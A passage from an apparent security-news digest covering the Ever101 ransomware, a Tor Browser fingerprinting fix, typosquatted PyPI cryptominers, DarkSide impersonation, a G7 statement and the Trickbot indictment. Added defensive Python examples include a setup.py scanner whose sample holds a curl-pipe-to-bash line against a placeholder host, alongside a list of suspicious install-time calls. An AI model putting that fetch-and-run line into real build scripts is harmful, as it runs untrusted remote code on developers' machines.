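    records: iterable of dicts with 'pan', 'terminal' and 'ts' keys.
    """
    tokens = {pan_token(p) for p in watchlist_pans if luhn_ok(p)}
    hits = defaultdict(list)
    for rec in records:
        if luhn_ok(rec["pan"]) and pan_token(rec["pan"]) in tokens:
            hits[rec["terminal"]].append(rec["ts"])
    return dict(hits)


# Constructed authorization records. 4111111111111111 plays the part of the
# indicator PAN; 5555555555554444 is ordinary traffic; the last PAN fails Luhn.
SAMPLE_RECORDS = [
    {"pan": "5555555555554444", "terminal": "ATM-NYC-0417", "ts": "2017-03-02T09:58:00Z"},
    {"pan": "4111111111111111", "terminal": "ATM-NYC-0417", "ts": "2017-03-02T10:15:00Z"},
    {"pan": "5555555555554444", "terminal": "ATM-MEX-0092", "ts": "2017-03-04T17:40:00Z"},
    {"pan": "4111111111111111", "terminal": "ATM-MEX-0092", "ts": "2017-03-04T18:02:00Z"},
    {"pan": "1234567812345678", "terminal": "ATM-MEX-0092", "ts": "2017-03-04T18:03:00Z"},
]

if __name__ == "__main__":
    for terminal, times in find_compromised_terminals(SAMPLE_RECORDS, ["4111111111111111"]).items():
        print(f"ALERT download card seen at {terminal}: {', '.join(times)}")
```

The alert fires once per terminal the indicator PAN touched, which is the list of freshly shimmed ATMs the article describes; a real deployment would feed this from the network's authorization stream and key the HMAC from an HSM rather than a constant.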
  10. A ransomware attack targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages. The attack was conducted by a more recent ransomware operation known as Ever101, which compromised an Israeli computer farm and proceeded to encrypt its devices. In a new report by Israeli cybersecurity firms Profero and Security Joes, who performed incident response on the attack, Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware. When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer.
Example Ever101 ransom note
While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures. "During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero and Security Joes' report. The known tools used by the Ever101 gang include:
xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder.
PH64.exe - 64-bit version of the Process Hacker program.
Cobalt Strike - The threat actors deployed Cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature.
SystemBC - SystemBC was used to proxy Cobalt Strike traffic through a SOCKS5 proxy to avoid detection.
Other tools were also found but were encrypted by the ransomware.
Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well:
SoftPerfect Network Scanner - An IPv4/IPv6 network scanner.
shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device.
NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives.
Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic.
WinRar with Arabic localization
Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization of some of these tools is a "false flag."
Following the money to a sensual massage
Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets. While tracing the payment, they found that a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site. RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures. Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage.
RubRatings Bitcoin Tip Jar
The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then used the coins to tip a masseuse or, more likely, used the site as a way to launder the ransom payment. "The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers." "The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC."
As bitcoin is becoming more easily traced, and even recovered by law enforcement, ransomware operations are looking for novel approaches to launder their ill-gotten gains. It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse. __________________
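An added example, not code from the Profero and Security Joes report: a small sweep for the on-disk indicators the post describes, the .ever101 extension, the !=READMY=!.txt note, and the tool file names recovered from the Music folder. The directory tree it scans is constructed in a temporary directory so the script runs offline; the tool-name list is taken from the post (the .exe extension on xDedicLogCleaner is an assumption) and in a real case would be supplemented with file hashes rather than names alone.

```python
"""Sweep a directory tree for Ever101 on-disk indicators.

Added example, not from the Profero / Security Joes report. Flags folders
holding .ever101 files, the !=READMY=!.txt note, or any of the tool file
names the post lists. The tree it scans is constructed in a temporary
directory so the script runs offline.
"""
import os
import tempfile
from pathlib import Path

RANSOM_EXT = ".ever101"
RANSOM_NOTE = "!=READMY=!.txt"
# Tool file names from the post, matched case-insensitively (extension on
# xDedicLogCleaner assumed).
TOOL_FILES = {"xdediclogcleaner.exe", "ph64.exe", "networkshare_pre2.exe", "shadow.bat"}


def sweep(root):
    """Return {relative_folder: {'encrypted': n, 'note': bool, 'tools': [...]}}.

    Only folders with at least one indicator are reported.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        encrypted = sum(1 for f in files if f.lower().endswith(RANSOM_EXT))
        note = RANSOM_NOTE in files
        tools = sorted(f for f in files if f.lower() in TOOL_FILES)
        if encrypted or note or tools:
            rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
            findings[rel] = {"encrypted": encrypted, "note": note, "tools": tools}
    return findings


def build_sample_tree():
    """Constructed victim tree: one encrypted folder, one staging folder, one clean folder."""
    root = Path(tempfile.mkdtemp(prefix="ever101-sweep-"))
    docs = root / "Documents"
    docs.mkdir()
    (docs / "q1-forecast.xlsx.ever101").write_bytes(b"\x00" * 32)
    (docs / RANSOM_NOTE).write_text("constructed ransom note text\n")
    music = root / "Music"
    music.mkdir()
    (music / "xDedicLogCleaner.exe").write_bytes(b"MZ")
    (music / "shadow.bat").write_text("rem constructed placeholder\n")
    pics = root / "Pictures"
    pics.mkdir()
    (pics / "holiday.jpg").write_bytes(b"\xff\xd8\xff")
    return root


if __name__ == "__main__":
    for folder, info in sweep(build_sample_tree()).items():
        print(folder, info)
```

Run against a mounted image or a live host root, the 'tools' hits point at the staging folder (the Music folder in this case), which is where the rest of the attacker's toolkit and any unencrypted copies are most likely to be found.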
  11. The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices. In May, JavaScript fingerprinting firm FingerprintJS disclosed a 'scheme flooding' vulnerability that allows the tracking of users across different browsers based on the applications installed on their device. To track users, a tracking profile is created for a user by attempting to open various application URL handlers, such as zoommtg://, and checking if the browser launches a prompt, like the one for Zoom below.
Zoom URL Handler
If the application's prompt is displayed, it can be assumed that the application is installed on the device. By checking for numerous URL handlers, the vulnerability can create an ID based on the unique configuration of installed apps on the user's device. This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari. This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged by sites. As this vulnerability tracks users across browsers, it could allow websites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome. With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false. This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts.
Full changelog
The full changelog for Tor Browser 10.0.18 is:
All Platforms
Update Tor to
Android
Update Fenix to 89.1.1
Update NoScript to 11.2.8
Bug 40055: Rebase android-components patches on 75.0.22 for Fenix 89
Bug 40165: Announce v2 onion service deprecation on about:tor
Bug 40166: Hide "Normal" tab (again) and Sync tab in TabTray
Bug 40167: Hide "Save to Collection" in menu
Bug 40169: Rebase fenix patches to fenix v89.1.1
Bug 40170: Error building tor-browser-89.1.1-10.5-1
Bug 40432: Prevent probing installed applications
Bug 40470: Rebase 10.0 patches onto 89.0
Build System
Android
Bug 40290: Update components for mozilla89-based Fenix
You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates. You can also download the latest browser from the Tor Browser download page and the distribution directory. __________________
  12. This week, multiple malicious packages were caught in the PyPI repository for Python projects that turned developers' workstations into cryptomining machines. All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects.
Bash script pulls in miner
A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April:
maratlib
maratlib1
matplatlib-plus
mllearnlib
mplatlib
learninglib
All came from user “nedog123” and the names of most of them are misspelled versions of the matplotlib legitimate plotting software. Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a blog post, noting that it was used as a dependency by the other malicious components. “For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes. While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available. Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine. The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for Ubiq cryptocurrency (UBQ). In another variant, the script included a different cryptomining program that uses GPU power, the open-source T-Rex. Attackers are constantly targeting open-source code repositories like PyPI [1, 2, 3], the NPM for NodeJS [1, 2, 3], or RubyGems. Even if the detection comes when the download count is low, as it typically happens, there is a significant risk as developers may integrate the malicious code in widely used projects.
In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371. __________________
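An added example, not Sonatype's Release Integrity or any PyPI tooling: two checks modelled on the packages named above, a name-similarity test against a short list of popular projects and an AST scan of setup.py for the download-and-execute behaviour the post describes. The popular-project list, the suffix list, the similarity threshold, the sample setup.py and its host name are all constructed for the example. As the results show, the name check flags maratlib, maratlib1, matplatlib-plus and mplatlib but not mllearnlib or learninglib, which is why the behavioural scan of the build script is the check that actually matters.

```python
"""Name-similarity and setup.py behaviour checks for a candidate PyPI package.

Added example: not Sonatype's Release Integrity and not PyPI's own tooling.
The popular-project list, the suffix list, the threshold and the sample
setup.py (with its host name) are constructed for this example.
"""
import ast

# Assumed short list of popular projects a registry would compare against.
POPULAR = ["matplotlib", "numpy", "requests", "scikit-learn", "pandas"]
# Add-on suffixes stripped before comparison (assumption for the example).
SUFFIXES = ("-plus", "-py", "-python", "-dev")
# Fraction of the longer name that may differ before a name stops looking like a typo.
MAX_RATIO = 0.4


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def normalize(name):
    """Lower-case, unify separators, drop trailing digits and add-on suffixes."""
    n = name.lower().replace("_", "-").rstrip("0123456789")
    for s in SUFFIXES:
        if n.endswith(s):
            n = n[: -len(s)]
    return n


def typosquat_candidates(name, popular=POPULAR, max_ratio=MAX_RATIO):
    """Return [(popular_name, distance)] for names close enough to look like a typo.

    An exact match (the real project itself) is not a candidate.
    """
    n = normalize(name)
    out = []
    for p in popular:
        dist = osa_distance(n, p.lower())
        longest = max(len(n), len(p))
        if 0 < dist and dist / longest <= max_ratio:
            out.append((p, dist))
    return sorted(out, key=lambda t: t[1])


# Calls that have no business in a build script that runs at install time.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "urllib.request.urlopen", "requests.get",
    "exec", "eval", "base64.b64decode",
}


def _dotted_name(node):
    """Turn a Name/Attribute chain such as os.system into 'os.system', else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted [(lineno, call)] for suspicious calls anywhere in setup.py."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)


# Constructed setup.py in the shape the post describes: fetch a shell script and run it.
# The host name is a placeholder, not the repository the post refers to.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import os
os.system("curl -fsSL https://example.invalid/aza2.sh | bash")
setup(name="maratlib", version="0.1")
'''

if __name__ == "__main__":
    for pkg in ["maratlib", "maratlib1", "matplatlib-plus", "mllearnlib", "mplatlib", "learninglib"]:
        print(pkg, typosquat_candidates(pkg))
    print(scan_setup_py(SAMPLE_SETUP_PY))
```

The AST scan is deliberately static: setup.py must never be executed to inspect it, since executing it is exactly what delivers the payload. It will miss calls hidden behind getattr or string assembly, so in practice it gates a package for human review rather than clearing it.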
  13. Attackers use DarkSide's prominence to carry out social engineering attacks. A number of organizations in the oil, gas and food sectors have received threatening emails from cybercriminals posing as DarkSide. According to researchers at Trend Micro, the attackers are exploiting the notoriety of the DarkSide ransomware to run a socially engineered intimidation campaign. In the emails, the criminals warn victims that the group has successfully compromised their corporate network and stolen confidential information, and that the stolen data will be made public unless the company pays a ransom of 100 bitcoins (roughly $3.8 million). DarkSide usually provides evidence of the data theft, but in this campaign the scammers offered no such proof. The campaign's organizers also made the mistake of referring in the emails to alleged previous DarkSide attacks that have recently made headlines: the emails cite the attack on the world's largest meat producer, JBS, but that incident was attributed to the REvil (Sodinokibi) group, not to DarkSide. As the experts note, DarkSide operators usually demand between $200,000 and $2 million, not the nearly $4 million demanded in this campaign. The campaign sent emails to businesses in Argentina, Australia, Canada, China, Colombia, India, Japan, Mexico, the Netherlands, Thailand, the United Kingdom and the United States. __________________
  14. G7 (Group of 7) leaders have asked Russia to urgently disrupt ransomware gangs believed to be operating within its borders, following a stream of attacks targeting organizations from critical sectors worldwide. The G7 member states also expressed their commitment to work together to address the escalating and immediate ransomware threat as a global challenge. "We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions," the G7 leaders (UK, USA, Canada, Japan, Germany, France, and Italy, plus the EU) said at the G7 Cornwall Summit. "In particular, we call on Russia [..] to identify, disrupt, and hold to account those within its borders who conduct ransomware attacks, abuse virtual currency to launder ransoms, and other cybercrime." This call to action comes after the White House National Security Council's chief cybersecurity adviser Anne Neuberger urged business leaders and corporate executives in early June to take ransomware attacks seriously. White House's public letter followed several attacks coordinated by ransomware gangs believed to be Russian-based. In early May, the DarkSide ransomware gang was behind an attack that forced Colonial Pipeline to shut down the largest pipeline in the US and pay a $5 million ransom. On the last day of May, the world's largest meat processor JBS was also forced to shut down production after REvil ransomware operators breached and encrypted some of its North American and Australian IT systems. The White House again declared the United States' commitment to battle ransomware operations together with the other G7 member states in a statement published over the weekend. "In just the last few weeks there have been several significant cyber intrusions affecting many G7 and other nations' critical infrastructure, manufacturing and electronics firms, and hospitals," the White House said. 
"The United States and our G7 partners are committed to working together to urgently address the escalating shared threat from criminal ransomware networks." Today, Lindy Cameron, the head of the UK's National Cyber Security Centre, also addressed this recent wave of ransomware attacks while speaking at the RUSI Annual Security Lecture. "For the vast majority of UK citizens and businesses, and indeed for the vast majority of critical national infrastructure providers and government service providers, the primary threat is not state actors but cyber criminals, and in particular the threat of ransomware," Cameron added. "Reporting really matters – even if you are a victim and it's too late to limit the damage to your business, it helps us help others. All this not only helps make businesses resilient to ransomware, but to the full range of cyber threats they face, and deters adversaries by increasing the cost of an attack." __________________
  15. The US Department of Justice (DOJ) announced today that a Latvian national was charged for her alleged role as a malware developer in the Trickbot transnational cybercrime organization. Alla Witte (aka Max) was charged with 19 counts of a 47-count indictment after being arrested on February 6 in Miami, Florida. As a Trickbot malware developer, Witte wrote the code used by the malware to control, deploy, and manage payments of ransomware, the DOJ said in a press release published today. Witte also purportedly provided the Trickbot Group with the code needed to monitor and track authorized malware users and developed the tools and protocols required to store login credentials stolen from victims' networks. The case was investigated by the FBI's Cleveland Office and DOJ's Ransomware and Digital Extortion Task Force, created to battle the increasing number of ransomware and digital extortion attacks. "Witte and her associates are accused of infecting tens of millions of computers worldwide, in an effort to steal financial information to ultimately siphon off millions of dollars through compromised computer systems," FBI special agent Eric B. Smith said. The Trickbot malware Trickbot is a malware strain first spotted in October 2016 as a modular banking trojan that has been continuously upgraded with new modules and features since then. Even though initially used only for harvesting sensitive data, Trickbot has slowly evolved into a highly dangerous malware dropper used to deliver additional, usually a lot more dangerous, malware payloads on infected devices. This regularly happens after all sensitive information (system info, credentials, and any interesting files) has been collected and exfiltrated to attacker-controlled servers. On October 12, Microsoft and several partners announced that they took down some Trickbot C2s. 
The US Cyber Command also reportedly tried to cripple the botnet before the presidential elections by pushing a configuration file to infected devices to cut them off from the botnet's C2 servers. However, despite these coordinated attacks against TrickBot's infrastructure, the TrickBot gang's botnet is still active, and the group is still releasing new malware builds. The TrickBot gang is known for distributing Ryuk and Conti ransomware onto the compromised network of valuable corporate targets. "Trickbot infected millions of victim computers worldwide and was used to harvest banking credentials and deliver ransomware," Deputy Attorney General Lisa O. Monaco said today. "The Trickbot malware was designed to steal the personal and financial information of millions of people around the world, thereby causing extensive financial harm and inflicting significant damage to critical infrastructure within the United States and abroad," Acting US Attorney Bridget M. Brennan of the Northern District of Ohio added. __________________